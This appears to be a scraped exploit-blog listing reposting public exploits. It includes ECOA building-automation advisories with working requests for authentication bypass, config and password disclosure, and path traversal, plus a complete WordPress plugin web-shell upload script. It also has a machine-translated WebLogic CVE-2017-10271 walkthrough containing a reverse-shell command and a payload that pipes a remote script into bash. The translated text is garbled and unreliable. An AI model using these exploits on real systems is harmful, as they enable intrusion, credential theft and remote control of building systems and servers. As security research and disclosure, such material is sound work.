HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller is vulnerable to configuration disclosure when direct object reference is made to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5673 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php 25.06.2021 -- Configuration / Backup Download / Privilege Escalation / Password Disclosure ---------------------------------------------------------------------------- - Unauthenticated config download reveals plain-text passwords $ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat $ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat $ strings * ... ... /opt/webpage/pwsd.bin /user user embed power 1234 1234 /opt/webpage/system.bin Oboothr=24 bootmin=00 OutIDWork=Y language=big5 seclanguage=Y ValSet=Y allpollTm=500 httpusr=embed httppwd=power ... ...
  11. HireHackking

    ECOA Building Automation System - Cookie Poisoning Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Cookie Poisoning Authentication Bypass # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Cookie Poisoning Authentication Bypass Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical access controls in smart homes and buildings and manipulate HVAC. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5672 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5672.php 25.06.2021 -- Authentication Bypass --------------------- - Authentication bypass happens by modifying the Cookie values. - Setting the UCLS Cookie larger or equal to 19 bypasses security controls. Request: GET /menu.jsp?fname=../sysuse/system01.frm&time=5 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: JSESSIONID=t00tw00t; UCLS=251; UID=zero; PWD=science; ROOT=FOUND; AlmCt=0 Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache
  12. HireHackking

    タイトル:Weblogic XmldeCoderの脱シリア化の脆弱性(CVE-2017-10271)が再び現れます

    HireHackking posted a blog entry in Hacker Technology
    Weblogic XmldeCoderの脱シリア化の脆弱性(CVE-2017-10271)-----バックライオン 0x01脆弱性の説明 最近、ハッカーはウェブロジック脱派化脆弱性CVE-2017-3248およびWEBLOGIC WLS LS LS LS LSコンポーネントリモートコード実行可能性CVE-2017-10271を使用しました。 Oracleは2017年10月に脆弱性のためのパッチを公式にリリースしましたが、脆弱性の詳細は開示しませんでした。会社が時間内にパッチを設置しない場合、攻撃されるリスクがあります。エンタープライズサーバーで大規模なリモート攻撃が開始され、多数のエンタープライズサーバーに深刻な脅威をもたらしました。影響を受けるバージョン:10.3.6.0.0、12.1.3.0.0、12.2.1.1.0、12.2.1.2.0 0x02攻撃手順 攻撃者が攻撃のためにターゲットホストを選択した後、彼は最初にCVE-2017-3248を攻撃に使用します。成功しているかどうかに関係なく、彼はCVE-2017-10271を使用して攻撃します。各攻撃中に、最初にWindowsシステム、次にLinuxシステムをターゲットにします。特定の攻撃プロセスは次のとおりです。 1. WebLogic Deserializationの脆弱性(CVE-2017-3248)を使用してLinuxでWgetを呼び出してシェルスクリプトをダウンロードし、Linux local "/bin/bash"を呼び出してシェルスクリプトを実行します。 (シェルスクリプトは、リモートダウンロードから時計採掘プログラムの実行のコントロールの詳細を定義します) 2。ウェブロジックの脱派化の脆弱性(CVE-2017-3248)を使用して、サンプルのダウンロードと実行のためにWindowsでPowerShellを呼び出します。 3. WebLogic WLSコンポーネントの脆弱性(CVE-2017-10271)を使用してLinuxでWGETを呼び出してシェルスクリプトをダウンロードし、Linuxローカル「/bin/bash」を呼び出してシェルスクリプトを実行します。 4. WebLogic WLSコンポーネントの脆弱性(CVE-2017-10271)を使用して、サンプルのダウンロードと悪意のあるコード実行のためにWindowsでPowerShellを呼び出します。 5。この攻撃事件では、CVE-2017-3248は失敗しましたが、CVE-2017-10271は正常に利用され、サーバーが攻撃者によってキャプチャされ、システムログに痕跡が残りました。 0x03分析と利用 この脆弱性は、WLS-WSAT.WARに表示されます。このコンポーネントは、Weblogic独自のWebサービスハンドラーを使用して、SOAPリクエストを処理します。まず、weblogic.wsee.jaxws.workcontext.workcontextservertubeクラスでxmlデータを取得し、最後に解析のためにxmldecoderに渡します。解析XMLのコールチェーンはです weblogic.wsee.jaxws.workcontext.workcontextservertube.processRequest weblogic.wsee.jaxws.workcontext.workcontexttube.readheaderold weblogic.wsee.workarea.workcontextxmlinputadapter 最初に参照してください weblogic.wsee.jaxws.workcontext.workcontextservertube.processRequestメソッド localheader1を取得した後、readheaderoldメソッドに渡します。コンテンツは、Work:WorkContextにラップされたデータであり、フォローアップを継続します。 weblogic.wsee.jaxws.workcontext.workcontexttube.readheaderoldメソッド この方法では、WorkContextXmlinputadapterクラスがインスタンス化され、取得されたXML形式のシリアル化データがこのタイプの構造方法に渡され、最後にスターリア化がXMldeCoderを介して実行されます。 XmldeCoderの脱力化問題は、13年で発見されました。最近、Weblogicで再び使用されています。これは、Javaエコシステムのセキュリティの問題がどれほど悪いかを示しています。 CVE-2017-3506によって提供されるパッチを修正するOracleの公式は、XMLがオブジェクトノードを含むかどうかを確認し、オブジェクトをvoidに置き換えてこのパッチをバイパスするため、この脆弱性には2つのCVE番号があることに言及する価値があります。したがって、修理プロセス中に、ユーザーは10月にOracleの役人が提供するパッチを使用する必要があります。 0x04脆弱性の再発 必要な環境VPSサーバー:ubuntu16.4 IP:x.x.x.x 必要なソフトウェア:burpusit 一般的に、Weblogicはポート7001と7002を開きます。 /wls-wsat /coordinatorporttype11ディレクトリにアクセスすると、次の図は脆弱性がある可能性があることを示しています。 http://11.203.x.x/wls-wsat/coordinatorporttype 最初に外部ネットワークサーバーにPython2.7をインストールします sudo apt-getインストールpython2.7 次に、外部ネットワークVPSサーバーで、VIMを使用してA.Shなどのリバウンドスクリプトを書き込みます(独自のサーバーIPとNCで聴くポートに記入) bash -i/dev/tcp/vpsip/ncport 01 または /bin/bash -i/dev/vpsip/ncport 01 Xshellを使用してサーバーに接続して実行します(PythonサーバーポートとNCポートは、独自の裁量で設定できます) python -m simplehttpserver pythonportおよびnc -lvp ncport 実行後、PCを使用してテストできます POST/WLS-WSAT/COORDINATORPORTTYPE HTTP/1.1 host: 11.203.x.x Accept-Encoding: ID Content-Length: 695 Accept-Language: ZH-CN、ZH; Q=0.8 Accept: */* user-agent: mozilla/5.0(Windows NT 5.1; RV:5.0)Gecko/20100101 Firefox/5.0 Accept-charset: GBK、utf-8; q=0.7、*; q=0.3 Connection: Keep-Alive Cache-Control: Max-age=0 Content-Type:テキスト/XML soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' soapenv3360header work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/' Javaバージョン='1.8.0_131' class='java.beans.xmldecoder' void class='java.lang.processbuilder' array class='java.lang.string' length='3' void index='0' 文字列/bin/bash/string /空所 void index='1' 文字列-C/文字列 /空所 void index='2' StringCurl http://x.x.x.x.x:81/a.sh | bash/string /空所 /配列 void method='start' //void /java /work:workcontext /soapenv3360header soapenv:body/ /soapenv3360envelope 上記のコードをBurpsuitのリピーターにコピーします。コードのHost: 11.203.x.xは、攻撃するターゲットオブジェクトに変更する必要があり、ターゲットのHSOTとポートもターゲットアドレスとポートに基づいていることに注意してください。 その中で void index='2' StringCurl http://x.x.x.x.x:81/a.sh | bash/string /空所 また、実際に変更する必要があります 次に、リピーターのGOを実行します サーバーが返されます HTTP/1.1 500内部サーバーエラー Connection:閉じます 日付: SAT、2017年12月23日05336016:01 GMT Content-Type: Text/XML; charset=utf-8 X-Powered-by:サーブレット/2.5 JSP/2.1 Content-Length: 262 ?xmlバージョン='1.0' encoding='utf-8'?s:envelope xmlns:s='http://schemas.xmlsoap.org/soap/envelope/' S:BODYS:FAULT XMLNS:NS4='http://WWW.W3.ORG/2003/05/SOAP-ENVELOPE'FAULTCODES:SERVER/FASTRCODEFAULTSTRING0/FAULTSTRING/S:FAULT/S:BODY/S3360ENVELOPE その後、VPS にリバウンドシェルが表示されます シェルを取得したい場合は大丈夫です サーバー/adminserver/tmp/_wl_internal/bea_wls_internal/9j4dqk/war/directoryに直接CD。これは、システムのデフォルトディレクトリです。次に、POCでJSPスクリプトをWGETしてから、MVコマンドを使用してこのディレクトリに移動できます。最も重要なことは、包丁に接続する場合、接続されたディレクトリではなく、/bea_wls_internal /ディレクトリの下のスクリプトファイルであることです。 PCチェックスクリプトを添付してください: #Coding:UTF-8 #!/bin/env python2 リクエストをインポートします Reをインポートします sysをインポートします Requests.packages.urllib3.ExceptionsからIntert IntersecureRequestWarningから #セキュリティリクエストの警告を無効にします requests.packages.urllib3.disable_warnings(insecureRequestWarning) #weblogicの脆弱性のアドレスを決定するために、PCがないため、当面はこの住所しか判断できません check_addr='/wls-wsat/coordinatorporttype11' shell_addr='/bea_wls_internal/connect.jsp' heads={'user-agent':' mozilla/5.0(windows nt 6.1)applewebkit/537.36(khtml、yike gecko)chrome/56.0.2924.87 Safari/537.36 '、 'Accept':' text/html、application/xhtml+xml、application/xml; q=0.9、image/webp、*/*; q=0.8 '、 'Accept-Language':' zh-cn、zh; q=0.8 '、 'Soapaction':' '、 'content-type':' text/xml; charset=utf-8 ' } post_str='' ' soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' soapenv3360header work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/' Java オブジェクトクラス='java.lang.processbuilder' array class='java.lang.string' length='3' void index='0' 文字列/bin/sh/文字列 /空所 void index='1' 文字列-C/文字列 /空所 void index='2' stringfind $ domain_home -type d -name bea_wls_internal |読みながら$ f -Type f -Nameを見つけます index.html; done | ff ff; do echo vulexist $(dirname $ ff)/connect.jsp; done/string /空所 /配列 void method='start'/ /物体 /java /work:workcontext /soapenv3360header soapenv:body/ /soapenv3360envelope '' ' def check(url): #print( '%d url:%s'%の検出(status_num、url)) vuln_url=url + check_addr content=requests.get(vuln_url、verify=false、timeout=10) content.status_code==200:の場合 rsp=requests.post(vuln_url、headers=heads、data=post_str.encode( 'utf-8')、検証=false、タイムアウト=10) content=rsp.content re.search(r'java \ .lang \ .processbuilder '、content、re.i):の場合 #印刷'getshell success、shell is:%s'%(url+shell_addr) string_to_write='おめでとう! weblogicリモートコマンド実行の脆弱性が存在する: \ n ' + url + shell_addr +' \ n ' string_to_writeを印刷します else: 印刷「失敗」 else: print(content.status_code) #脆弱性が存在するかどうかを判断します #ターゲット=sys.argv [1] ターゲット='https://x.x.x.com' print( ''+ターゲットのweblogic vulのチェック) チェック(ターゲット) #渡されたターゲットはhttp://www.baidu.com形式(ポートなし)です 0x04脆弱性修復の提案 1。一時的な解決策 攻撃者のPOC分析によると、使用されるコーディネーターポートタイプインターフェイスはWLS-WSATコンポーネントです。このコンポーネントがWeblogicサーバークラスターに適用されていない場合は、このコンポーネントを一時的にバックアップして削除し、保護機能が形成された後に復元することをお勧めします。 実際の環境パスに従って、WebLogic WLS-WSATコンポーネントを削除します。 rm -f /home/weblogic/oracle/middleware/wlserver_10.3/server/lib/wls-wsat.war rm -f /home/weblogic/oracle/middleware/user_projects/domains/base_domain/servers/adminserver/tmp/.internal/wls-wsat.war rm -rf/home/weblogic/oracle/middleware/user_projects/domains/base_domain/servers/adminserver/tmp/_wl_internal/wls -wsat WebLogic Domain Controller Service :を再起動します domain_name/bin/stopweblogic.sh #stopサービス domain_name/bin/startmanagedweblogic.sh #Startサービス 上記のファイルを削除した後、WebLogicを再起動する必要があります。 http://weblogic_ip/wls-wsat/が404ページかどうかを確認します。 2。公式パッチ修理 10月に提供されるセキュリティパッチをダウンロードするために、Oracleの公式Webサイトにアクセスしてください http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html アップグレードプロセスについては、次のことを参照してください。 http://blog.csdn.net/qqlifu/article/details/49423839 3。オンライン検査ツール http://Adlab.venustech.com.cn/vulscan https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?page_id=12 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 経験の概要: Linuxの下のリスニングポートは、複数のIPで回転できます
  13. HireHackking

    ECOA Building Automation System - Local File Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Local File Disclosure # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Local File Disclosure Vulnerability Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5679 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php 25.06.2021 -- Arbitrary File Disclosure ------------------------- - Attackers can disclose any file by abusing the 'fname' POST parameter in viewlog.jsp and reveal sensitive information. Request: POST /viewlog.jsp HTTP/1.1 Host: 192.168.1.3:8080 yr=2021&mh=6&fname=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin ... ...
  14. HireHackking

    Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/download-from-files # Date: 10/09/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugins/download-from-files/ # Version: <= 1.48 # Tested on: Ubuntu 20.04.1 LTS (x86) import os.path from os import path import json import requests; import sys def print_banner(): print("Download From Files <= 1.48 - Arbitrary File Upload") print("Author -> spacehen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url] [php file]") print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("Sikeres" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'download_from_files_617_fileupload' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'files[]' : open(file_path)} data = { "allowExt" : "php4,phtml", "filesName" : "files", "maxSize" : "1000", "uploadDir" : "." } print("Uploading Shell..."); response = requests.post(uri, files=files, data=data ) file_name = path.basename(file_path) if("ok" in response.text): print("Shell Uploaded!") if(base[-1] != '/'): base += '/' print(base + "wp-admin/" + file_name); else: print("Shell Upload Failed") sys.exit(1) main();
  15. HireHackking

    ECOA Building Automation System - Remote Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Remote Privilege Escalation # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Remote Privilege Escalation Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller is vulnerable to weak access control mechanism allowing any user to escalate privileges by disclosing credentials of administrative accounts in plain-text. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5677 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5677.php 25.06.2021 -- Privilege Escalation -------------------- - Any user can navigate to the User Edit page (useredt.jsp) and see the password of other users in clear-text. Request: $ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed <tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>embed</td><td>power</td><td>19</td><td>&nbsp;</td><tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>root</td><td>embed</td><td>19</td><td>&nbsp;</td><input type='hidden' name='delrow' value='' >
  16. HireHackking

    ECOA Building Automation System - Arbitrary File Deletion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Arbitrary File Deletion # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Arbitrary File Deletion Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the 